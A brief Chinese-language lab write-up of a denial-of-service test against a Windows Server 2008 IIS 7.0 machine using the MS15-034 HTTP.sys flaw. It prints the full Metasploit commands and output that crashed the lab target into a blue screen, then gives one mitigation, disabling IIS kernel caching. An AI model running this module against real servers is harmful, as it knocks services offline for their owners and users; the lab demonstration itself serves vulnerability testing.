上一篇的文章方法进行检测漏洞是否存在,接着我们搭建win2008进行DOS攻击测试,导致服务器蓝屏,异常关机。
靶机:windows2008 IIS7.0 192.168.31.91
攻击机:Kali
攻击机进行访问靶机web界面:
可以正常访问,接着使用MSF进行攻击测试
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > use auxiliary/dos/http/ms15_034_ulonglongadd msf auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.31.91 rhosts => 192.168.31.91 msf auxiliary(dos/http/ms15_034_ulonglongadd) > run [*] DOS request sent [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
执行完毕后,看靶机界面情况,已蓝屏
临时漏洞防御:
禁用IIS内核缓存(可能降低IIS性能)
